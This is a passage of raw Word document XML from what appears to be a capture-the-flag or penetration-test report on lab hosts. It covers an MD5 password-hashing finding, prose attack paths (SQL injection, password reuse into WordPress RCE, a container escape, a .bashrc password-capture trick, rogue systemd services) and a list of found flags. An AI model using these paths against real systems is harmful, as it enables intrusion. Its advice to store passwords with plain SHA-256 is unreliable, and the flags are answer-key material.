                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:t>References:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FD2C776" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:hyperlink r:id="rId37">
              <w:r>
                <w:rPr>
                  <w:color w:val="1155CC"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/04-Testing_for_Weak_Encryption</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0C775F5B" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
      <w:pPr>
        <w:ind w:right="1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A91E5F9" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:right="1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Exploitation Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3058FA" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The following piece of code leverages MD5 to verify the provided user password against the values inside the database, suggesting that the hashes found are MD5 based:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD2284B" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="2C4221B4" wp14:editId="0013CCF0">
            <wp:extent cx="3687128" cy="1007616"/>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3687128" cy="1007616"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="686084EF" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Moreover, as suggested in section 7 of this report, it was possible to obtain the plaintext associated with two of the passwords found inside the target’s database, which validates them as MD5 hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D8ADCC" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="afb"/>
        <w:tblW w:w="10080" w:type="dxa"/>
        <w:tblInd w:w="-7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2"/>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="2BB26DE1" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="6890574E" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:t>Who:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04723045" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>IT Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="7796460B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="772E2E05" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:t>Vector:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41A87B7D" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>Remote</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="215BD576" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="5B0A19D1" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:t>Action:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D8D50A7" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>Consider using a more robust hashing algorithm to securely store passwords, such as SHA-256 or SHA-512.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5B18CB95" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_heading=h.hg5707bx14ub" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Exploitation Paths</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61470A6A" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">The following are possible attack scenarios that might have been followed by attackers </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>in order to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> achieve persistence on the assessed system, given the presence of malware and IOCs as described in the previous sections of this report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6764F0" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:hanging="425"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_heading=h.6xdapbvuiwp3" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r>
        <w:t>SQL Injection based exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029842A1" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Since an SQL injection vulnerability has been discovered on the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>target, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> given the presence of common credentials between admin accounts for both internal.vese.com and the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> admin panel on vese.com, an attacker could have obtained the MD5 hash for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>eladministrador</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on internal.vese.com (which is trivial as shown in section 7 of this report). By reusing the password in order to login as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>ElAdministrador</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> admin panel at </w:t>
      </w:r>
      <w:hyperlink r:id="rId39">
        <w:r>
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://vese.com/wp-admin</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">, an attacker could achieve remote code execution by altering the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> files (more details on this can be found at the following link: </w:t>
      </w:r>
      <w:hyperlink r:id="rId40" w:anchor="panel-rce">
        <w:r>
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/wordpress#panel-rce</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">). Once achieved Remote Code Execution, an attacker would have needed to escape the Docker container for the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>instance, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> establish persistence through one of the IOCs previously described.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2640BC48" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_heading=h.dwl3rociz8bu" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r>
        <w:t>Pseudo-Terminal RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C83ECEE" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:r>
        <w:t>By allowing external access to the Pseudo-Terminal service on port 6969 of host vese.com, an attacker might have leveraged the assessed RCE vulnerability (described in more detail in section 1 of this report) to achieve persistence, by first escaping the docker container for the service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C25179E" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_heading=h.4isc5ms7a7sa" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r>
        <w:t>Logged-in rogue user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0607C1DF" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">A rogue user (such as a disgruntled employee) might have been able to leverage its session on the target system to sniff for network traffic, intercepting the MQTT credentials passed in cleartext through the network. Since the very same password is used by user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>johnsysadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (which has sysadmin privileges) this might have allowed the rogue user to achieve further persistence as a privileged user, for example by creating the previously described malicious </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>systemd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A547B3" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_heading=h.30izco5ruo5p" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r>
        <w:t>Hijacked user password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BC8700" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">An attacker might have had physical access to a machine with a session open on the target system as user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>johnsysadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. This would explain the attempt at obtaining the user’s password by editing /home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>johnsysadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bashrc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and creating the /home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>johnsysadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/.locale/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fsudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6093F745" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_heading=h.c5vzrnjjwxk2" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r>
        <w:t>Physical access to the machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3607D9" w14:textId="733DA7E3" w:rsidR="00A26206" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">As shown in section 3 of this report, a physical disk might have been connected to a machine where a session for user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>eliseo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> was running. This could have been leveraged to create the associated malicious </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>systemd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> service and achieve further persistence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FEEDA0" w14:textId="6D3EBA9F" w:rsidR="00A26206" w:rsidRDefault="00A26206">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8A4719" w14:textId="7AF4CC6F" w:rsidR="00A26206" w:rsidRDefault="00A26206" w:rsidP="00A26206">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Flags found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C53AEA5" w14:textId="77777777" w:rsidR="00A26206" w:rsidRPr="00A26206" w:rsidRDefault="00A26206" w:rsidP="00A26206"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8485"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A26206" w14:paraId="263217DC" w14:textId="77777777" w:rsidTr="00A26206">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C3FC9EB" w14:textId="3710781E" w:rsidR="00A26206" w:rsidRDefault="00A26206" w:rsidP="00A26206">
            <w:r>
              <w:t>{</w:t>
            </w:r>
            <w:r w:rsidRPr="00842331">
              <w:t>FLAG_PSEUTERM_COIN_256579}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A26206" w14:paraId="698BC343" w14:textId="77777777" w:rsidTr="00A26206">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E69BD30" w14:textId="03E9FA31" w:rsidR="00A26206" w:rsidRDefault="00A26206" w:rsidP="00A26206">
            <w:r w:rsidRPr="00842331">
              <w:t>{FLAG_PSEUTERM_MISC_359867}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A26206" w14:paraId="77294B6E" w14:textId="77777777" w:rsidTr="00A26206">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="639C1D9F" w14:textId="422FEE96" w:rsidR="00A26206" w:rsidRDefault="00A26206" w:rsidP="00A26206">
            <w:r w:rsidRPr="00842331">
              <w:t>{FLAG_INTWEBSI_SQLI_306481}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A26206" w14:paraId="2A70B4FB" w14:textId="77777777" w:rsidTr="00A26206">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51DD1B64" w14:textId="43E0C097" w:rsidR="00A26206" w:rsidRDefault="00A26206" w:rsidP="00A26206">
            <w:r w:rsidRPr="00842331">
              <w:t>{FLAG_INTWEBSI_IHAL_421571}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A26206" w14:paraId="09C1283A" w14:textId="77777777" w:rsidTr="00A26206">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48554191" w14:textId="2049415E" w:rsidR="00A26206" w:rsidRDefault="00A26206" w:rsidP="00A26206">
            <w:r>
              <w:t>{F</w:t>
            </w:r>
            <w:r w:rsidRPr="00AB373C">
              <w:t>LAG_PUBWEBSI_PWDR_660749}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A26206" w14:paraId="5C777A09" w14:textId="77777777" w:rsidTr="00A26206">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B739713" w14:textId="355D64D4" w:rsidR="00A26206" w:rsidRDefault="00A26206" w:rsidP="00A26206">
            <w:r w:rsidRPr="00AB373C">
              <w:t>{FLAG_PUBWEBSI_BACK_892356}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A26206" w14:paraId="63730B22" w14:textId="77777777" w:rsidTr="00A26206">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FC353CF" w14:textId="5AF1DCE6" w:rsidR="00A26206" w:rsidRDefault="00A26206" w:rsidP="00A26206">
            <w:r w:rsidRPr="00AB373C">
              <w:t>{FLAG_MAINHOST_RUBD_507598}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A26206" w14:paraId="76A77795" w14:textId="77777777" w:rsidTr="00A26206">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54C3CD4A" w14:textId="5B16EFB2" w:rsidR="00A26206" w:rsidRDefault="00A26206" w:rsidP="00A26206">
            <w:r w:rsidRPr="00AB373C">
              <w:t>{FLAG_MAINHOST_FASU_172836}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A26206" w14:paraId="23AEA999" w14:textId="77777777" w:rsidTr="00A26206">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="473DA9FA" w14:textId="0BB45320" w:rsidR="00A26206" w:rsidRDefault="00A26206" w:rsidP="00A26206">
            <w:r w:rsidRPr="00290AA4">
              <w:t>{FLAG_MAINHOST_CREV_115070}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A26206" w14:paraId="19CF5F42" w14:textId="77777777" w:rsidTr="00A26206">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51ED5B2B" w14:textId="4E32E62C" w:rsidR="00A26206" w:rsidRDefault="00A26206" w:rsidP="00A26206">
            <w:r w:rsidRPr="00290AA4">
              <w:t>{FLAG_MAINHOST_RANS_982080}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F80AF89" w14:textId="77777777" w:rsidR="00A26206" w:rsidRPr="00A26206" w:rsidRDefault="00A26206" w:rsidP="00A26206"/>
    <w:sectPr w:rsidR="00A26206" w:rsidRPr="00A26206">
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1417" w:right="1711" w:bottom="1417" w:left="170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auto"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Libre Franklin">
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>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D6959"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B47A34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CDB5A52"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="799E0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3D17118"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0520FB86"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="FindingTableLabel"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:hanging="283"/>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4750B9B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D21E7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A8E77AE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="53C295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23C174F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B0EA8B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73F6108"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="87E84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83149885">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="995492849">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1273321982">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1935940091">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1034619516">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1354309771">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="9480043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1FF2"/>
    <w:rsid w:val="00545500"/>
    <w:rsid w:val="00A20B6B"/>
    <w:rsid w:val="00A26206"/>
    <w:rsid w:val="00BC1FF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96703"/>
  <w15:docId w15:val="{F08E70EC-5129-49DC-8301-FC2C6216D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0B0F"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Century Gothic" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Century Gothic" w:cstheme="majorBidi"/>
      <w:b/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00BD0B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0B0F"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:contextualSpacing/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Franklin Gothic Book" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="28"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TitleChar">
    <w:name w:val="Title Char"/>
